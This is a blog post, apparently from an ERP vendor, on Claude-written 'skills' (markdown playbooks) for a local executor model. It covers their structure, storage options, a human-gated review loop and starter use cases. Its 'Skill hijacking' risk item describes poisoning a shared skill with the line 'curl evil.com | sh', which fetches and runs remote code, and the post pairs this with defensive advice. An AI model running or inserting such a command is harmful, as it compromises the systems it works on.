24 May
In EP1 — Planner-Executor Pattern we covered Claude thinking + Local AI doing. The follow-up question came up immediately: if Local AI has to handle work it has never done before, how do we "teach" it without fine-tuning the model (which burns GPU and takes days)? The answer is Skills — playbooks that Claude writes as SOPs for Local AI to load when it encounters a matching trigger. This article explains how skills for Local AI differ from skills Claude reads itself, three ways to store skills in an enterprise, the skill review loop that prevents skill drift, and how to roll this out across a real team.
Quick summary — skills in the Planner-Executor context
✓ It is: a markdown playbook + tool list + trigger condition that Local AI loads when it sees matching work — Claude writes and maintains them.
✗ It isn't: fine-tuning, vector-DB embeddings, or a fixed system prompt. A skill loads only when a trigger matches.
Why Skills — The Gap EP1 Doesn't Close
EP1 ends with Claude writing a plan that Local AI executes — which sounds good until Local AI has to do something it has never done before, like "deploy this Angular app to nginx and reload the service." Every time work like that comes in, Claude has to write the plan from scratch, even though it's repetitive work that's 95% identical each time.
That is where skills come in. The first time, Claude thinks, Local AI does, and Claude then summarises the work into a skill. From the second time on, Claude just says "use the skill called deploy-angular-nginx" and Local AI loads it and follows along. Claude's token use drops another 5–10× compared to EP1.
The corporate analogy
Think of a team lead writing an SOP for new hires. The first time they have to walk through every step. After that, they just say "follow SOP-DEPLOY-007" — the new hire opens the doc, follows it, and the lead doesn't have to repeat themselves. Skills work the same way.
What a Skill Actually Is — The Real Structure
A skill used in the Planner-Executor pattern has four parts, written as a single markdown file:
| Part | Purpose | Example |
|---|---|---|
| 1. Frontmatter | Metadata: name, description, trigger keywords | name: deploy-angular-nginx |
| 2. Trigger | Conditions under which Local AI loads this skill | "deploy angular", "ng build + reload nginx" |
| 3. Steps | Explicit sequence of steps (no implicit ones) | step 1: cd /app, step 2: npm run build, ... |
| 4. Tools | Tools this skill is allowed to use | bash, write_file, http_post |
A typical skill is 200–800 lines of markdown — longer than an ad-hoc plan in EP1, but reusable thousands of times. The economics work out fast.
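As a rough illustration of the four parts, here is a minimal Python sketch that parses a skill file into a structured object. The file layout (a `---` fenced frontmatter with comma-separated `triggers` and `tools`, followed by numbered steps), the `Skill` class, the `parse_skill` function, and the description text are all assumptions made for this example, not a format the pattern prescribes.

```python
from dataclasses import dataclass, field
from typing import List

# Hypothetical skill file: frontmatter between '---' lines, then numbered steps.
SKILL_TEXT = """---
name: deploy-angular-nginx
description: Build an Angular app and reload nginx
triggers: deploy angular, ng build + reload nginx
tools: bash, write_file, http_post
---
1. cd /app
2. npm run build
"""


@dataclass
class Skill:
    name: str
    description: str
    triggers: List[str]
    tools: List[str]
    steps: List[str] = field(default_factory=list)


def _split_list(value: str) -> List[str]:
    """Split a comma-separated frontmatter value into trimmed items."""
    return [item.strip() for item in value.split(",") if item.strip()]


def parse_skill(text: str) -> Skill:
    """Parse the assumed layout: '---' fenced frontmatter, then 'N. step' lines."""
    _, frontmatter, body = text.split("---", 2)
    meta = {}
    for line in frontmatter.strip().splitlines():
        key, _, value = line.partition(":")
        meta[key.strip()] = value.strip()
    # A step is any body line that starts with a digit, e.g. "2. npm run build".
    steps = [ln.partition(".")[2].strip() for ln in body.splitlines() if ln[:1].isdigit()]
    return Skill(
        name=meta["name"],
        description=meta["description"],
        triggers=_split_list(meta["triggers"]),
        tools=_split_list(meta["tools"]),
        steps=steps,
    )
```

Calling `parse_skill(SKILL_TEXT)` yields an object whose `tools` list can be used to restrict what the executor is allowed to call.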
Claude's Own Skills vs Skills Claude Writes for Local AI
This is where many teams trip up on first contact — they take a skill Claude reads for itself and hand it to Local AI. It doesn't work, because Claude infers implicit context far better than Local AI does.
| Dimension | Skill for Claude | Skill for Local AI (e.g. Qwen 32B) |
|---|---|---|
| Explicitness | Moderate — Claude infers missing context | Maximum — name the working directory, env vars, commands directly |
| Typical size | 100–300 lines | 300–800 lines (3–5× longer) |
| Error handling | General patterns are enough | List each error case + the matching fix |
| Decision point | "If this is a production deploy, use flag X" | "If env STAGE=prod run step 4a; if STAGE=staging run step 4b" |
| Output format | "return summary" | "return JSON {status, files_changed, log_tail_20_lines}" |
The upshot: a Local-AI skill is essentially a script written as markdown — strip out as much ambiguity as possible. That's why Claude has to write the skills, not Local AI — Local AI doesn't know what it can't infer; it's the person who doesn't know what they don't know.
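An explicit output format is only useful if something checks it. The sketch below validates an executor's reply against the `{status, files_changed, log_tail_20_lines}` shape from the table. The field types (a string and two lists), the 20-entry cap, and the `validate_result` helper are assumptions for illustration.

```python
import json
from typing import List

# Assumed types for the three fields named in the table above.
REQUIRED_FIELDS = {"status": str, "files_changed": list, "log_tail_20_lines": list}


def validate_result(raw: str) -> List[str]:
    """Return a list of problems; an empty list means the reply matches the contract."""
    try:
        data = json.loads(raw)
    except json.JSONDecodeError as exc:
        return [f"not valid JSON: {exc.msg}"]
    if not isinstance(data, dict):
        return ["top-level value must be a JSON object"]
    problems = []
    for name, expected in REQUIRED_FIELDS.items():
        if name not in data:
            problems.append(f"missing field: {name}")
        elif not isinstance(data[name], expected):
            problems.append(f"{name} should be {expected.__name__}")
    tail = data.get("log_tail_20_lines")
    if isinstance(tail, list) and len(tail) > 20:
        problems.append("log_tail_20_lines has more than 20 entries")
    return problems
```

A free-text reply such as "done" fails immediately, which is the point: the orchestrator can reject it without asking Claude to interpret it.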
Three Ways to Store Skills
As skills accumulate (you might be at 100–500 within six months), storage matters as much as authoring. Get it wrong and you end up with scattered files nobody can find.
| Approach | How it works | Suitable for | Limits |
|---|---|---|---|
| A. Shared folder | Store in .skills/ inside the repo; Claude and Local AI both read files directly | Small dev teams of 1–5, fewer than 50 skills | Hard to search at scale, no dedicated version control |
| B. MCP Server | Host skills as tools via Model Context Protocol — both models call through the API | Teams already using MCP that want a unified interface | You now have one more service to maintain |
| C. Skill Registry (DB-backed) | A database with skills + version + metrics (success rate, last used) | Organisations using skills daily, that want A/B testing and audit | Most complex setup, needs a dedicated team |
Always start with A. Teams that jump straight to C burn 2–3 months building infrastructure they'll outgrow because they don't yet know what skills they really need — the same reason you build ERP process-first, schema-second (see also ERP Implementation — How to Begin When Your Org Wants ERP).
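Approach A needs very little code. The following sketch indexes a shared skills folder and matches an incoming task against trigger phrases. It assumes each skill is a `.md` file containing a single `triggers:` line with comma-separated phrases, and that matching is a plain case-insensitive substring test; `load_triggers` and `match_skills` are hypothetical helper names.

```python
from pathlib import Path
from typing import Dict, List

PREFIX = "triggers:"


def load_triggers(skills_dir: Path) -> Dict[str, List[str]]:
    """Map each skill name (the file stem) to its lower-cased trigger phrases."""
    index: Dict[str, List[str]] = {}
    for path in sorted(skills_dir.glob("*.md")):
        for line in path.read_text(encoding="utf-8").splitlines():
            if line.startswith(PREFIX):
                phrases = line[len(PREFIX):].split(",")
                index[path.stem] = [p.strip().lower() for p in phrases if p.strip()]
                break  # only the first 'triggers:' line counts
    return index


def match_skills(task: str, index: Dict[str, List[str]]) -> List[str]:
    """Return every skill whose trigger phrase appears in the task text."""
    task_lc = task.lower()
    return [name for name, phrases in index.items() if any(p in task_lc for p in phrases)]
```

Returning every match, rather than only the first, makes overlapping skills visible early instead of leaving the executor to guess between them.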
Skill Review Loop — Preventing Skill Drift
The problem teams hit after 1–2 months on this pattern is skill drift — new skills Claude generates look fine, but when Local AI follows them the result is wrong, because the skill was never tested against the actual executor.
The fix is a four-stage skill review loop:
| Stage | Who | Work | Pass criteria |
|---|---|---|---|
| 1. Generate | Claude | Drafts a skill from a task that has repeated several times | Lint passes (frontmatter complete, every step has an action verb) |
| 2. Dry-run | Local AI | Runs the skill against pre-built test fixtures | ≥ 90% success rate over 10 runs |
| 3. Verify | Claude | Reads logs from all 10 runs and checks results against spec | No false positives |
| 4. Promote | Human (DevOps) | Approves it into the production registry | Human gate before any real use |
Stage 4 is the most important. Never let a skill into production without human approval, no matter how good the dry run looks, because fixtures never cover every real-world case. The same principle applies in the audit trail discussion in AI Internal Audit — Auditing AI in Enterprise Work.
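The four pass criteria can be expressed as one gate function. This is a sketch under assumptions: the `ReviewRecord` fields and the `next_blocker` helper are hypothetical names, while the thresholds (10 runs, 90% success, zero false positives, human sign-off) come from the table above.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ReviewRecord:
    lint_passed: bool            # stage 1: Generate
    dry_run_results: List[bool]  # stage 2: one entry per fixture run
    false_positives: int         # stage 3: runs reported as success that missed the spec
    human_approved: bool         # stage 4: explicit DevOps sign-off


def next_blocker(rec: ReviewRecord, required_runs: int = 10,
                 min_rate: float = 0.9) -> Optional[str]:
    """Return the first stage still blocking promotion, or None if all four passed."""
    if not rec.lint_passed:
        return "generate: lint failed"
    if len(rec.dry_run_results) < required_runs:
        return "dry-run: not enough runs"
    rate = sum(rec.dry_run_results) / len(rec.dry_run_results)
    if rate < min_rate:
        return f"dry-run: success rate {rate:.0%} is below {min_rate:.0%}"
    if rec.false_positives > 0:
        return "verify: false positives found"
    if not rec.human_approved:
        return "promote: waiting for human approval"
    return None
```

Because the human check comes last and has no default, a skill with a perfect dry run still returns a blocker until someone approves it.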
⚠️ Risks Specific to a Skill System
1. Skill sprawl
When Claude can write skills easily, teams write a lot of them, and a month in you have 200 skills with 3–4 overlapping ones per task. Local AI doesn't know which to pick. Fix: set a quota on new-skill creation and run a monthly audit that merges duplicates.
2. Skill hijacking
If the registry is open to editing, an insider (or even an AI agent) could modify a widely-used skill to run something dangerous, for example by slipping curl evil.com | sh into a step nobody scans carefully. Fix: put skills through code review like real code, with a diff-approval workflow.
3. Stale skills
A skill written six months ago may refer to paths or libraries that have since moved. Local AI follows it and it fails. Fix: track last_success_at per skill — if it hasn't been used in a while and then fails, flag it for Claude to regenerate.
4. Over-fitting to one executor
A skill tested against Qwen 32B may not work on Llama 70B because instruction-following differs per model. Fix: if you plan to run multiple executors, test every skill against every executor before promotion.
| Risk | Mitigation | Owner |
|---|---|---|
| Skill sprawl | Creation quota + monthly dedupe audit | Tech Lead |
| Skill hijacking | Code review + diff approval, sign skills with a key | DevOps + Security |
| Stale skills | Track last_success_at, auto-flag on failure | Orchestrator |
| Over-fitting executor | Test against every executor before promotion | QA / Tech Lead |
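The stale-skill mitigation reduces to a small check the orchestrator can run on every failure. In this sketch the 90-day idle window is an assumed value standing in for "a while", and `should_flag_for_regeneration` is a hypothetical helper name; only `last_success_at` comes from the text.

```python
from datetime import datetime, timedelta
from typing import Optional


def should_flag_for_regeneration(
    last_success_at: Optional[datetime],
    failed_at: datetime,
    max_idle: timedelta = timedelta(days=90),  # assumed threshold
) -> bool:
    """Call this when a skill run fails.

    Flags the skill if it has never succeeded, or if its last success is
    older than max_idle at the time of the failure.
    """
    if last_success_at is None:
        return True
    return failed_at - last_success_at > max_idle
```

A failure shortly after a recent success is more likely a transient problem than a stale skill, so it is deliberately not flagged here.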
Real Use Cases — Three Skills Most Teams Start With
If you're building a skill registry for the first time, start with these three — the scope is clear, verification is easy, and ROI shows up fast.
A. Skill: generate-migration
Trigger: when there's a schema diff between dev and staging — Local AI generates the migration script (Alembic / Flyway / hand-written SQL) per the skill's steps. Output is a .sql file plus a rollback script.
B. Skill: write-test-from-bug-report
Trigger: when a Linear/Jira bug report includes reproduction steps. Local AI generates a failing test case (red test) from the steps and drops it into the test suite, ready to turn green once the dev fixes the bug.
C. Skill: changelog-from-commits
Trigger: before a release — Local AI reads git log since the last tag, groups by conventional commit type (feat/fix/chore), and writes CHANGELOG.md in the standard format.
All three have immediately verifiable output (run the test, dry-run the migration in a sandbox, read the CHANGELOG), making them ideal for validating that Claude-written skills actually work for your Local AI.
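To make the third skill concrete, here is a minimal sketch of the grouping step in changelog-from-commits. It takes commit subject lines (for example, the output of `git log <last-tag>..HEAD --pretty=%s`) and groups them by conventional commit type. The `other` bucket, the heading layout, and the function names are assumptions; the source does not define what "the standard format" looks like.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, List

# Matches "feat: ...", "fix(scope): ...", "chore!: ..." style subjects.
COMMIT_RE = re.compile(r"^(?P<type>feat|fix|chore)(\([^)]*\))?!?:\s*(?P<subject>.+)$")
SECTION_ORDER = ("feat", "fix", "chore", "other")


def group_commits(subjects: Iterable[str]) -> Dict[str, List[str]]:
    """Group commit subjects by type; non-conforming subjects go to 'other'."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for raw in subjects:
        subject = raw.strip()
        match = COMMIT_RE.match(subject)
        if match:
            groups[match.group("type")].append(match.group("subject"))
        else:
            groups["other"].append(subject)
    return dict(groups)


def render_changelog(version: str, groups: Dict[str, List[str]]) -> str:
    """Render one release section in an assumed markdown layout."""
    lines = [f"## {version}"]
    for ctype in SECTION_ORDER:
        if groups.get(ctype):
            lines.append(f"### {ctype}")
            lines.extend(f"- {s}" for s in groups[ctype])
    return "\n".join(lines) + "\n"
```

Keeping non-conforming commits in a visible `other` section, rather than dropping them, makes it easy for a reviewer to spot what the executor could not classify.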
How Saeree ERP Looks at Skills
Developing Saeree ERP means maintaining many modules (accounting, inventory, HR, GFMIS adapter, report engine, etc.), and the same maintenance tasks recur several times a month: "add a new validation rule to form X", "generate a report definition from template Y". These are strong skill candidates because the pattern is identical every time and only the parameters change.
In the next phase of the AI Assistant that Saeree ERP is building, a skill registry is likely to be the key component that lets our on-premise customers "teach" the AI to handle their org-specific customisations without those skills ever leaving the machine. That is the same goal as the Planner-Executor pattern in EP1.
Summary — What Skills Add to Planner-Executor
| Compared on | EP1 (Planner-Executor as-is) | EP2 (adding Skills) |
|---|---|---|
| Repetitive work | Claude writes a fresh plan every time | Claude calls an existing skill — tokens drop 5–10× |
| New work | Claude thinks, Local AI does | Same, plus if it'll repeat → Claude promotes it to a skill |
| Executor quality | Depends on each plan | More stable — skills are reviewed |
| Overhead | None — runs immediately | Maintain a skill registry and a review loop |
| Right when | Work isn't stable yet, no clear pattern | The same pattern has shown up ≥ 5 times |
"Skills are how you let the smart AI write SOPs for the cheap AI — so the cheap AI does the work of the smart AI, on tasks where the pattern is already stable."
A Question to Sit With
Of the work your dev/IT team repeats every week, how many patterns are really "SOPs that were never written down"? If AI helped turn those into runnable skills, how many hours per week would you give back to the team? List the five skill candidates closest to hand; that's the seed of a skill registry in your org.
If you're evaluating an AI architecture that bundles planner + executor + skill registry for use with core internal systems, book a consultation with the Saeree ERP team for help fitting it to your data policy and workflow.
References
- Anthropic — Claude Code Skills documentation
- Anthropic — Agent Skills announcement
- Anthropic — Building Effective Agents — orchestrator-workers pattern
- Model Context Protocol — MCP specification (skill-as-tool transport)
- Ollama — Qwen2.5-Coder (executor reference model)
